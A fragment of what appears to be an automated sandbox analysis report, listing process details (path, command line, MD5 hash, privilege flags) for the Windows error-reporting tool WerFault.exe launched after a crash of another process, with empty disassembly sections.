                                                                                                                                MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high

                                                                                                                                Analysis Process: WerFault.exe PID: 4880 Parent PID: 4360

                                                                                                                                General

                                                                                                                                Start time:00:50:53
                                                                                                                                Start date:12/10/2021
                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4360 -s 848
                                                                                                                                Imagebase:0xe60000
                                                                                                                                File size:434592 bytes
                                                                                                                                MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high

                                                                                                                                Disassembly

                                                                                                                                Code Analysis

                                                                                                                                Reset < >